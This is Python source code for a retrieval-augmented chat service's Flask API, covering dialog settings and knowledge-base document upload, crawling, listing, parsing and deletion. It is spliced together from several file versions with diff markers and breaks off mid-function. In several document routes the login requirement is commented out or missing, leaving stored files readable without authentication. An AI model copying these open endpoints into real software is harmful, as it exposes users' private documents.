#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#

from flask import request
from flask_login import login_required, current_user
from api.db.services.dialog_service import DialogService
from api.db import StatusEnum
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService, UserTenantService
from api.settings import RetCode
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result


@manager.route('/set', methods=['POST'])
@login_required
def set_dialog():
    req = request.json
    dialog_id = req.get("dialog_id")
    name = req.get("name", "New Dialog")
    description = req.get("description", "A helpful Dialog")
    icon = req.get("icon", "")
    top_n = req.get("top_n", 6)
    top_k = req.get("top_k", 1024)
    rerank_id = req.get("rerank_id", "")
    if not rerank_id:
        req["rerank_id"] = ""
    similarity_threshold = req.get("similarity_threshold", 0.1)
    vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
    if vector_similarity_weight is None:
        vector_similarity_weight = 0.3
    llm_setting = req.get("llm_setting", {})
    default_prompt = {
        "system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
以下是知识库:
{knowledge}
以上是知识库。""",
        "prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
        "parameters": [
            {"key": "knowledge", "optional": False}
        ],
        "empty_response": "Sorry! 知识库中未找到相关内容!"
    }
    prompt_config = req.get("prompt_config", default_prompt)

    if not prompt_config["system"]:
        prompt_config["system"] = default_prompt["system"]
    # if len(prompt_config["parameters"]) < 1:
    #     prompt_config["parameters"] = default_prompt["parameters"]
    # for p in prompt_config["parameters"]:
    #     if p["key"] == "knowledge":break
    # else: prompt_config["parameters"].append(default_prompt["parameters"][0])

    for p in prompt_config["parameters"]:
        if p["optional"]:
            continue
        if prompt_config["system"].find("{%s}" % p["key"]) < 0:
            return get_data_error_result(
                retmsg="Parameter '{}' is not used".format(p["key"]))

    try:
        e, tenant = TenantService.get_by_id(current_user.id)
        if not e:
            return get_data_error_result(retmsg="Tenant not found!")
        llm_id = req.get("llm_id", tenant.llm_id)
        if not dialog_id:
            if not req.get("kb_ids"):
                return get_data_error_result(
                    retmsg="Fail! Please select knowledgebase!")
            dia = {
                "id": get_uuid(),
                "tenant_id": current_user.id,
                "name": name,
                "kb_ids": req["kb_ids"],
                "description": description,
                "llm_id": llm_id,
                "llm_setting": llm_setting,
                "prompt_config": prompt_config,
                "top_n": top_n,
                "top_k": top_k,
                "rerank_id": rerank_id,
                "similarity_threshold": similarity_threshold,
                "vector_similarity_weight": vector_similarity_weight,
                "icon": icon
            }
            if not DialogService.save(**dia):
                return get_data_error_result(retmsg="Fail to new a dialog!")
            e, dia = DialogService.get_by_id(dia["id"])
            if not e:
                return get_data_error_result(retmsg="Fail to new a dialog!")
            return get_json_result(data=dia.to_json())
        else:
            del req["dialog_id"]
            if "kb_names" in req:
                del req["kb_names"]
            if not DialogService.update_by_id(dialog_id, req):
                return get_data_error_result(retmsg="Dialog not found!")
            e, dia = DialogService.get_by_id(dialog_id)
            if not e:
                return get_data_error_result(retmsg="Fail to update a dialog!")
            dia = dia.to_dict()
            dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
            return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get', methods=['GET'])
@login_required
def get():
    dialog_id = request.args["dialog_id"]
    try:
        e, dia = DialogService.get_by_id(dialog_id)
        if not e:
            return get_data_error_result(retmsg="Dialog not found!")
        dia = dia.to_dict()
        dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
        return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


def get_kb_names(kb_ids):
    ids, nms = [], []
    for kid in kb_ids:
        e, kb = KnowledgebaseService.get_by_id(kid)
        if not e or kb.status != StatusEnum.VALID.value:
            continue
        ids.append(kid)
        nms.append(kb.name)
    return ids, nms


@manager.route('/list', methods=['GET'])
@login_required
def list_dialogs():
    try:
        diags = DialogService.query(
            tenant_id=current_user.id,
            status=StatusEnum.VALID.value,
            reverse=True,
            order_by=DialogService.model.create_time)
        diags = [d.to_dict() for d in diags]
        for d in diags:
            d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
        return get_json_result(data=diags)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("dialog_ids")
def rm():
    req = request.json
    dialog_list = []
    tenants = UserTenantService.query(user_id=current_user.id)
    try:
        for id in req["dialog_ids"]:
            for tenant in tenants:
                if DialogService.query(tenant_id=tenant.tenant_id, id=id):
                    break
            else:
                return get_json_result(
                    data=False, retmsg='Only the owner of the dialog is authorized for this operation.',
                    retcode=RetCode.OPERATING_ERROR)
            dialog_list.append({"id": id, "status": StatusEnum.INVALID.value})
        DialogService.update_many_by_id(dialog_list)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
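

# Illustrative client-side sketch (assumed base URL and cookie, and the /set
# mount point is hypothetical): creating a dialog through the endpoint above.
# Only "kb_ids" is mandatory for a new dialog; everything else falls back to
# the defaults defined in set_dialog().
def _example_create_dialog(kb_ids, name="New Dialog"):
    import requests

    url = "http://127.0.0.1:9380/v1/dialog/set"  # assumed mount point
    resp = requests.post(url, json={"name": name, "kb_ids": kb_ids},
                         cookies={"session": "<your-session-cookie>"})
    resp.raise_for_status()
    return resp.json()["data"]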

@@ -1,418 +1,484 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#

import os
import pathlib
import re

import flask
from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user

from api.db.db_models import Task, File
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.task_service import TaskService, queue_tasks
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH
from api.db.services import duplicate_name
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType, TaskStatus, ParserType, FileSource
from api.db.services.document_service import DocumentService
from api.settings import RetCode
from api.utils.api_utils import get_json_result
from rag.utils.minio_conn import MINIO
from api.utils.file_utils import filename_type, thumbnail


@manager.route('/upload', methods=['POST'])
@login_required
@validate_request("kb_id")
def upload():
    kb_id = request.form.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    if 'file' not in request.files:
        return get_json_result(
            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)

    file_objs = request.files.getlist('file')
    for file_obj in file_objs:
        if file_obj.filename == '':
            return get_json_result(
                data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)

    e, kb = KnowledgebaseService.get_by_id(kb_id)
    if not e:
        raise LookupError("Can't find this knowledgebase!")

    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])

    err = []
    for file in file_objs:
        try:
            MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
            if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(kb.tenant_id) >= MAX_FILE_NUM_PER_USER:
                raise RuntimeError("Exceed the maximum file number of a free user!")

            filename = duplicate_name(
                DocumentService.query,
                name=file.filename,
                kb_id=kb.id)
            filetype = filename_type(filename)
            if filetype == FileType.OTHER.value:
                raise RuntimeError("This type of file has not been supported yet!")

            location = filename
            while MINIO.obj_exist(kb_id, location):
                location += "_"
            blob = file.read()
            MINIO.put(kb_id, location, blob)
            doc = {
                "id": get_uuid(),
                "kb_id": kb.id,
                "parser_id": kb.parser_id,
                "parser_config": kb.parser_config,
                "created_by": current_user.id,
                "type": filetype,
                "name": filename,
                "location": location,
                "size": len(blob),
                "thumbnail": thumbnail(filename, blob)
            }
            if doc["type"] == FileType.VISUAL:
                doc["parser_id"] = ParserType.PICTURE.value
            if re.search(r"\.(ppt|pptx|pages)$", filename):
                doc["parser_id"] = ParserType.PRESENTATION.value
            DocumentService.insert(doc)

            FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
        except Exception as e:
            err.append(file.filename + ": " + str(e))
    if err:
        return get_json_result(
            data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
    return get_json_result(data=True)


@manager.route('/create', methods=['POST'])
@login_required
@validate_request("name", "kb_id")
def create():
    req = request.json
    kb_id = req["kb_id"]
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)

    try:
        e, kb = KnowledgebaseService.get_by_id(kb_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")

        if DocumentService.query(name=req["name"], kb_id=kb_id):
            return get_data_error_result(
                retmsg="Duplicated document name in the same knowledgebase.")

        doc = DocumentService.insert({
            "id": get_uuid(),
            "kb_id": kb.id,
            "parser_id": kb.parser_id,
            "parser_config": kb.parser_config,
            "created_by": current_user.id,
            "type": FileType.VIRTUAL,
            "name": req["name"],
            "location": "",
            "size": 0
        })
        return get_json_result(data=doc.to_json())
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_docs():
    kb_id = request.args.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    keywords = request.args.get("keywords", "")

    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 15))
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        docs, tol = DocumentService.get_by_kb_id(
            kb_id, page_number, items_per_page, orderby, desc, keywords)
        return get_json_result(data={"total": tol, "docs": docs})
    except Exception as e:
        return server_error_response(e)


@manager.route('/thumbnails', methods=['GET'])
@login_required
def thumbnails():
    doc_ids = request.args.get("doc_ids").split(",")
    if not doc_ids:
        return get_json_result(
            data=False, retmsg='Lack of "Document ID"', retcode=RetCode.ARGUMENT_ERROR)

    try:
        docs = DocumentService.get_thumbnails(doc_ids)
        return get_json_result(data={d["id"]: d["thumbnail"] for d in docs})
    except Exception as e:
        return server_error_response(e)


@manager.route('/change_status', methods=['POST'])
@login_required
@validate_request("doc_id", "status")
def change_status():
    req = request.json
    if str(req["status"]) not in ["0", "1"]:
        # the error result must be returned, otherwise execution falls through
        return get_json_result(
            data=False,
            retmsg='"Status" must be either 0 or 1!',
            retcode=RetCode.ARGUMENT_ERROR)

    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")

        if not DocumentService.update_by_id(
                req["doc_id"], {"status": str(req["status"])}):
            return get_data_error_result(
                retmsg="Database error (Document update)!")

        if str(req["status"]) == "0":
            ELASTICSEARCH.updateScriptByQuery(Q("term", doc_id=req["doc_id"]),
                                              scripts="ctx._source.available_int=0;",
                                              idxnm=search.index_name(
                                                  kb.tenant_id)
                                              )
        else:
            ELASTICSEARCH.updateScriptByQuery(Q("term", doc_id=req["doc_id"]),
                                              scripts="ctx._source.available_int=1;",
                                              idxnm=search.index_name(
                                                  kb.tenant_id)
                                              )
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("doc_id")
def rm():
    req = request.json
    doc_ids = req["doc_id"]
    if isinstance(doc_ids, str):
        doc_ids = [doc_ids]
    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    errors = ""
    for doc_id in doc_ids:
        try:
            e, doc = DocumentService.get_by_id(doc_id)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(doc_id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")

            b, n = File2DocumentService.get_minio_address(doc_id=doc_id)

            if not DocumentService.remove_document(doc, tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")

            f2d = File2DocumentService.get_by_document_id(doc_id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc_id)

            MINIO.rm(b, n)
        except Exception as e:
            errors += str(e)

    if errors:
        return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)

    return get_json_result(data=True)


@manager.route('/run', methods=['POST'])
@login_required
@validate_request("doc_ids", "run")
def run():
    req = request.json
    try:
        for id in req["doc_ids"]:
            info = {"run": str(req["run"]), "progress": 0}
            if str(req["run"]) == TaskStatus.RUNNING.value:
                info["progress_msg"] = ""
                info["chunk_num"] = 0
                info["token_num"] = 0
            DocumentService.update_by_id(id, info)
            # if str(req["run"]) == TaskStatus.CANCEL.value:
            tenant_id = DocumentService.get_tenant_id(id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=id), idxnm=search.index_name(tenant_id))

            if str(req["run"]) == TaskStatus.RUNNING.value:
                TaskService.filter_delete([Task.doc_id == id])
                e, doc = DocumentService.get_by_id(id)
                doc = doc.to_dict()
                doc["tenant_id"] = tenant_id
                bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
                queue_tasks(doc, bucket, name)

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rename', methods=['POST'])
@login_required
@validate_request("doc_id", "name")
def rename():
    req = request.json
    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
                doc.name.lower()).suffix:
            return get_json_result(
                data=False,
                retmsg="The extension of file can't be changed",
                retcode=RetCode.ARGUMENT_ERROR)
        for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
            if d.name == req["name"]:
                return get_data_error_result(
                    retmsg="Duplicated document name in the same knowledgebase.")

        if not DocumentService.update_by_id(
                req["doc_id"], {"name": req["name"]}):
            return get_data_error_result(
                retmsg="Database error (Document rename)!")

        informs = File2DocumentService.get_by_document_id(req["doc_id"])
        if informs:
            e, file = FileService.get_by_id(informs[0].file_id)
            FileService.update_by_id(file.id, {"name": req["name"]})

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get/<doc_id>', methods=['GET'])
# @login_required
def get(doc_id):
    try:
        e, doc = DocumentService.get_by_id(doc_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")

        b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
        response = flask.make_response(MINIO.get(b, n))

        ext = re.search(r"\.([^.]+)$", doc.name)
        if ext:
            if doc.type == FileType.VISUAL.value:
                response.headers.set('Content-Type', 'image/%s' % ext.group(1))
            else:
                response.headers.set(
                    'Content-Type',
                    'application/%s' %
                    ext.group(1))
        return response
    except Exception as e:
        return server_error_response(e)


@manager.route('/change_parser', methods=['POST'])
@login_required
@validate_request("doc_id", "parser_id")
def change_parser():
    req = request.json
    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if doc.parser_id.lower() == req["parser_id"].lower():
            if "parser_config" in req:
                if req["parser_config"] == doc.parser_config:
                    return get_json_result(data=True)
            else:
                return get_json_result(data=True)

        if doc.type == FileType.VISUAL or re.search(
                r"\.(ppt|pptx|pages)$", doc.name):
            return get_data_error_result(retmsg="Not supported yet!")

        e = DocumentService.update_by_id(doc.id,
                                         {"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
                                          "run": TaskStatus.UNSTART.value})
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if "parser_config" in req:
            DocumentService.update_parser_config(doc.id, req["parser_config"])
        if doc.token_num > 0:
            e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
                                                    doc.process_duation * -1)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(req["doc_id"])
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/image/<image_id>', methods=['GET'])
# @login_required
def get_image(image_id):
    try:
        bkt, nm = image_id.split("-")
        response = flask.make_response(MINIO.get(bkt, nm))
        response.headers.set('Content-Type', 'image/JPEG')
        return response
    except Exception as e:
        return server_error_response(e)
||||
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import hashlib
import json
import os
import pathlib
import re
import traceback
from concurrent.futures import ThreadPoolExecutor
from copy import deepcopy
from io import BytesIO

import flask
from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user

from api.db.db_models import Task, File
from api.db.services.dialog_service import DialogService, ConversationService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.llm_service import LLMBundle
from api.db.services.task_service import TaskService, queue_tasks
from api.db.services.user_service import TenantService, UserTenantService
from graphrag.mind_map_extractor import MindMapExtractor
from rag.app import naive
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH
from api.db.services import duplicate_name
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType, TaskStatus, ParserType, FileSource, LLMType
from api.db.services.document_service import DocumentService, doc_upload_and_parse
from api.settings import RetCode, stat_logger
from api.utils.api_utils import get_json_result
from rag.utils.storage_factory import STORAGE_IMPL
from api.utils.file_utils import filename_type, thumbnail, get_project_base_directory
from api.utils.web_utils import html2pdf, is_valid_url

@manager.route('/upload', methods=['POST'])
@login_required
@validate_request("kb_id")
def upload():
    kb_id = request.form.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    if 'file' not in request.files:
        return get_json_result(
            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)

    file_objs = request.files.getlist('file')
    for file_obj in file_objs:
        if file_obj.filename == '':
            return get_json_result(
                data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)

    e, kb = KnowledgebaseService.get_by_id(kb_id)
    if not e:
        raise LookupError("Can't find this knowledgebase!")

    err, _ = FileService.upload_document(kb, file_objs, current_user.id)
    if err:
        return get_json_result(
            data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
    return get_json_result(data=True)
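

# Illustrative sketch (not part of the original file): calling /upload from a
# client with `requests`. The base URL, port, endpoint prefix and session
# cookie are assumptions about a typical deployment, not verified values.
def _example_upload_request():
    import requests  # assumed available in the client environment
    files = [("file", open("report.pdf", "rb"))]  # multipart field must be "file"
    resp = requests.post(
        "http://localhost:9380/v1/document/upload",  # hypothetical mount point
        data={"kb_id": "my-kb-id"},                  # hypothetical knowledgebase id
        files=files,
        cookies={"session": "..."},                  # @login_required expects a session
    )
    # On success get_json_result(data=True) yields a JSON body with data == true.
    print(resp.json())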


@manager.route('/web_crawl', methods=['POST'])
@login_required
@validate_request("kb_id", "name", "url")
def web_crawl():
    kb_id = request.form.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    name = request.form.get("name")
    url = request.form.get("url")
    if not is_valid_url(url):
        return get_json_result(
            data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
    e, kb = KnowledgebaseService.get_by_id(kb_id)
    if not e:
        raise LookupError("Can't find this knowledgebase!")

    blob = html2pdf(url)
    if not blob:
        return server_error_response(ValueError("Download failure."))

    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])

    try:
        filename = duplicate_name(
            DocumentService.query,
            name=name + ".pdf",
            kb_id=kb.id)
        filetype = filename_type(filename)
        if filetype == FileType.OTHER.value:
            raise RuntimeError("This type of file has not been supported yet!")

        location = filename
        while STORAGE_IMPL.obj_exist(kb_id, location):
            location += "_"
        STORAGE_IMPL.put(kb_id, location, blob)
        doc = {
            "id": get_uuid(),
            "kb_id": kb.id,
            "parser_id": kb.parser_id,
            "parser_config": kb.parser_config,
            "created_by": current_user.id,
            "type": filetype,
            "name": filename,
            "location": location,
            "size": len(blob),
            "thumbnail": thumbnail(filename, blob)
        }
        if doc["type"] == FileType.VISUAL:
            doc["parser_id"] = ParserType.PICTURE.value
        if doc["type"] == FileType.AURAL:
            doc["parser_id"] = ParserType.AUDIO.value
        if re.search(r"\.(ppt|pptx|pages)$", filename):
            doc["parser_id"] = ParserType.PRESENTATION.value
        DocumentService.insert(doc)
        FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
    except Exception as e:
        return server_error_response(e)
    return get_json_result(data=True)
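

# Illustrative sketch (assumption, not in the original file): a /web_crawl call.
# The crawled page is rendered to PDF via html2pdf and stored under the kb_id
# bucket, appending "_" to the key until it is free, as the loop above shows.
def _example_web_crawl_request():
    import requests
    resp = requests.post(
        "http://localhost:9380/v1/document/web_crawl",  # hypothetical URL
        data={"kb_id": "my-kb-id",                      # hypothetical ids/values
              "name": "infiniflow-homepage",
              "url": "https://infiniflow.org"},
        cookies={"session": "..."},
    )
    print(resp.json())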


@manager.route('/create', methods=['POST'])
@login_required
@validate_request("name", "kb_id")
def create():
    req = request.json
    kb_id = req["kb_id"]
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)

    try:
        e, kb = KnowledgebaseService.get_by_id(kb_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")

        if DocumentService.query(name=req["name"], kb_id=kb_id):
            return get_data_error_result(
                retmsg="Duplicated document name in the same knowledgebase.")

        doc = DocumentService.insert({
            "id": get_uuid(),
            "kb_id": kb.id,
            "parser_id": kb.parser_id,
            "parser_config": kb.parser_config,
            "created_by": current_user.id,
            "type": FileType.VIRTUAL,
            "name": req["name"],
            "location": "",
            "size": 0
        })
        return get_json_result(data=doc.to_json())
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_docs():
    kb_id = request.args.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    tenants = UserTenantService.query(user_id=current_user.id)
    for tenant in tenants:
        if KnowledgebaseService.query(
                tenant_id=tenant.tenant_id, id=kb_id):
            break
    else:
        # for/else: reached only when no joined tenant owns this knowledgebase
        return get_json_result(
            data=False, retmsg='Only owner of knowledgebase authorized for this operation.',
            retcode=RetCode.OPERATING_ERROR)
    keywords = request.args.get("keywords", "")

    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 15))
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        docs, tol = DocumentService.get_by_kb_id(
            kb_id, page_number, items_per_page, orderby, desc, keywords)
        return get_json_result(data={"total": tol, "docs": docs})
    except Exception as e:
        return server_error_response(e)


@manager.route('/infos', methods=['POST'])
def docinfos():
    req = request.json
    doc_ids = req["doc_ids"]
    docs = DocumentService.get_by_ids(doc_ids)
    return get_json_result(data=list(docs.dicts()))


@manager.route('/thumbnails', methods=['GET'])
# @login_required
def thumbnails():
    doc_ids = request.args.get("doc_ids").split(",")
    if not doc_ids:
        return get_json_result(
            data=False, retmsg='Lack of "Document ID"', retcode=RetCode.ARGUMENT_ERROR)

    try:
        docs = DocumentService.get_thumbnails(doc_ids)
        return get_json_result(data={d["id"]: d["thumbnail"] for d in docs})
    except Exception as e:
        return server_error_response(e)


@manager.route('/change_status', methods=['POST'])
@login_required
@validate_request("doc_id", "status")
def change_status():
    req = request.json
    if str(req["status"]) not in ["0", "1"]:
        return get_json_result(
            data=False,
            retmsg='"Status" must be either 0 or 1!',
            retcode=RetCode.ARGUMENT_ERROR)

    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")

        if not DocumentService.update_by_id(
                req["doc_id"], {"status": str(req["status"])}):
            return get_data_error_result(
                retmsg="Database error (Document update)!")

        # Mirror the status flag into Elasticsearch so disabled documents drop
        # out of retrieval immediately.
        if str(req["status"]) == "0":
            scripts = "ctx._source.available_int=0;"
        else:
            scripts = "ctx._source.available_int=1;"
        ELASTICSEARCH.updateScriptByQuery(
            Q("term", doc_id=req["doc_id"]),
            scripts=scripts,
            idxnm=search.index_name(kb.tenant_id))
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
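

# Sketch (assumption): the payload updateScriptByQuery plausibly sends to
# Elasticsearch's _update_by_query API. The wrapper lives in
# rag/utils/es_conn.py; its exact request shape is not shown here, so this is
# for orientation only.
def _example_update_by_query_body(doc_id, available):
    return {
        "query": {"term": {"doc_id": doc_id}},
        "script": {"source": "ctx._source.available_int=%d;" % available,
                   "lang": "painless"},
    }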


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("doc_id")
def rm():
    req = request.json
    doc_ids = req["doc_id"]
    if isinstance(doc_ids, str):
        doc_ids = [doc_ids]
    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    errors = ""
    for doc_id in doc_ids:
        try:
            e, doc = DocumentService.get_by_id(doc_id)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(doc_id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")

            b, n = File2DocumentService.get_minio_address(doc_id=doc_id)

            if not DocumentService.remove_document(doc, tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")

            f2d = File2DocumentService.get_by_document_id(doc_id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc_id)

            STORAGE_IMPL.rm(b, n)
        except Exception as e:
            errors += str(e)

    if errors:
        return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)

    return get_json_result(data=True)
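

# Sketch: /rm accepts either a single id or a list, per the isinstance()
# branch above, so both of these hypothetical request bodies are valid.
_example_rm_payloads = [
    {"doc_id": "0d5a1c2b..."},                   # hypothetical single id
    {"doc_id": ["0d5a1c2b...", "7f3e9a10..."]},  # hypothetical batch
]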


@manager.route('/run', methods=['POST'])
@login_required
@validate_request("doc_ids", "run")
def run():
    req = request.json
    try:
        for id in req["doc_ids"]:
            info = {"run": str(req["run"]), "progress": 0}
            if str(req["run"]) == TaskStatus.RUNNING.value:
                info["progress_msg"] = ""
                info["chunk_num"] = 0
                info["token_num"] = 0
            DocumentService.update_by_id(id, info)
            # if str(req["run"]) == TaskStatus.CANCEL.value:
            tenant_id = DocumentService.get_tenant_id(id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=id), idxnm=search.index_name(tenant_id))

            if str(req["run"]) == TaskStatus.RUNNING.value:
                TaskService.filter_delete([Task.doc_id == id])
                e, doc = DocumentService.get_by_id(id)
                doc = doc.to_dict()
                doc["tenant_id"] = tenant_id
                bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
                queue_tasks(doc, bucket, name)

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
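

# Sketch: restarting parsing means wiping the documents' chunks from the index
# and queueing fresh tasks, as run() does above. A hypothetical payload:
_example_run_payload = {
    "doc_ids": ["0d5a1c2b..."],  # hypothetical document ids
    "run": "1",                  # assumed to match TaskStatus.RUNNING.value
}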


@manager.route('/rename', methods=['POST'])
@login_required
@validate_request("doc_id", "name")
def rename():
    req = request.json
    try:
